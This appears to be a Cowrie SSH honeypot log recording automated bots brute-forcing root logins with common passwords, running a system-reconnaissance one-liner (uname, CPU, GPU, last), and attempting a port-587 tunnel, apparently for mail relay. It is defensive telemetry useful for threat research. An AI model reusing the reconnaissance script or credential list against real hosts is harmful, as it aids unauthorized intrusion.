{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.448406Z","src_ip":"185.93.89.7","session":"bb7d3fdf9e04"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:43:56.723602Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.724258Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.724927Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.725762Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.727239Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.728033Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.728784Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.729979Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.730534Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.731044Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.731492Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.732158Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:43:56.732687Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:43:58.594948Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:58.595875Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:43:58.597332Z","src_ip":"212.227.125.160","session":"02d26c424600"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":47912,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d4f09d4ce1e","protocol":"ssh","message":"New connection: 51.79.164.132:47912 (1.2.3.4:22) [session: 3d4f09d4ce1e]","sensor":"my-vps","timestamp":"2025-08-28T08:44:07.724205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:44:08.224500Z","src_ip":"51.79.164.132","session":"3d4f09d4ce1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:44:08.257159Z","src_ip":"51.79.164.132","session":"3d4f09d4ce1e"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:44:10.092238Z","src_ip":"51.79.164.132","session":"3d4f09d4ce1e"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:44:11.608281Z","src_ip":"51.79.164.132","session":"3d4f09d4ce1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60090,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bf69cc22f43","protocol":"ssh","message":"New connection: 212.227.235.229:60090 (1.2.3.4:22) [session: 7bf69cc22f43]","sensor":"my-vps","timestamp":"2025-08-28T08:44:23.488453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:44:23.489550Z","src_ip":"212.227.235.229","session":"7bf69cc22f43"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:44:23.615496Z","src_ip":"212.227.235.229","session":"7bf69cc22f43"}
{"eventid":"cowrie.login.success","username":"root","password":"4rfv$RFV","message":"login attempt [root/4rfv$RFV] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:44:24.206819Z","src_ip":"212.227.235.229","session":"7bf69cc22f43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T08:44:24.335136Z","session":"7bf69cc22f43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T08:44:24.461619Z","src_ip":"212.227.235.229","session":"7bf69cc22f43"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:44:24.588790Z","src_ip":"212.227.235.229","session":"7bf69cc22f43"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48944,"dst_ip":"1.2.3.4","dst_port":22,"session":"1548c83f4068","protocol":"ssh","message":"New connection: 185.93.89.7:48944 (1.2.3.4:22) [session: 1548c83f4068]","sensor":"my-vps","timestamp":"2025-08-28T08:44:33.652476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:44:33.653785Z","src_ip":"185.93.89.7","session":"1548c83f4068"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:44:33.670591Z","src_ip":"185.93.89.7","session":"1548c83f4068"}
{"eventid":"cowrie.login.success","username":"root","password":"index1234!","message":"login attempt [root/index1234!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:44:33.746515Z","src_ip":"185.93.89.7","session":"1548c83f4068"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:44:33.769053Z","src_ip":"185.93.89.7","session":"1548c83f4068"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":50899,"dst_ip":"1.2.3.4","dst_port":22,"session":"177f916ed4a5","protocol":"ssh","message":"New connection: 186.225.142.90:50899 (1.2.3.4:22) [session: 177f916ed4a5]","sensor":"my-vps","timestamp":"2025-08-28T08:44:33.987256Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":43636,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1cc0e929619","protocol":"ssh","message":"New connection: 51.79.164.132:43636 (1.2.3.4:22) [session: a1cc0e929619]","sensor":"my-vps","timestamp":"2025-08-28T08:44:34.026947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:44:34.062000Z","src_ip":"186.225.142.90","session":"177f916ed4a5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:44:34.172474Z","src_ip":"51.79.164.132","session":"a1cc0e929619"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:44:34.293633Z","src_ip":"186.225.142.90","session":"177f916ed4a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:44:34.699028Z","src_ip":"51.79.164.132","session":"a1cc0e929619"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:44:36.045737Z","src_ip":"51.79.164.132","session":"a1cc0e929619"}
{"eventid":"cowrie.login.success","username":"root","password":"09098199","message":"login attempt [root/09098199] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:44:36.453462Z","src_ip":"186.225.142.90","session":"177f916ed4a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:44:36.800097Z","src_ip":"51.79.164.132","session":"a1cc0e929619"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:44:36.800805Z","src_ip":"51.79.164.132","session":"a1cc0e929619"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:44:37.473855Z","src_ip":"51.79.164.132","session":"a1cc0e929619"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:44:37.475037Z","src_ip":"51.79.164.132","session":"a1cc0e929619"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:44:38.089757Z","src_ip":"186.225.142.90","session":"177f916ed4a5"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T08:44:38.090614Z","src_ip":"186.225.142.90","session":"177f916ed4a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:44:38.726955Z","src_ip":"186.225.142.90","session":"177f916ed4a5"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:44:39.208948Z","src_ip":"186.225.142.90","session":"177f916ed4a5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":39546,"dst_ip":"1.2.3.4","dst_port":22,"session":"66534e044f6e","protocol":"ssh","message":"New connection: 185.93.89.7:39546 (1.2.3.4:22) [session: 66534e044f6e]","sensor":"my-vps","timestamp":"2025-08-28T08:44:42.755200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:44:42.756277Z","src_ip":"185.93.89.7","session":"66534e044f6e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:44:42.779815Z","src_ip":"185.93.89.7","session":"66534e044f6e"}
{"eventid":"cowrie.login.success","username":"root","password":"Index1234!","message":"login attempt [root/Index1234!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:44:42.835656Z","src_ip":"185.93.89.7","session":"66534e044f6e"}
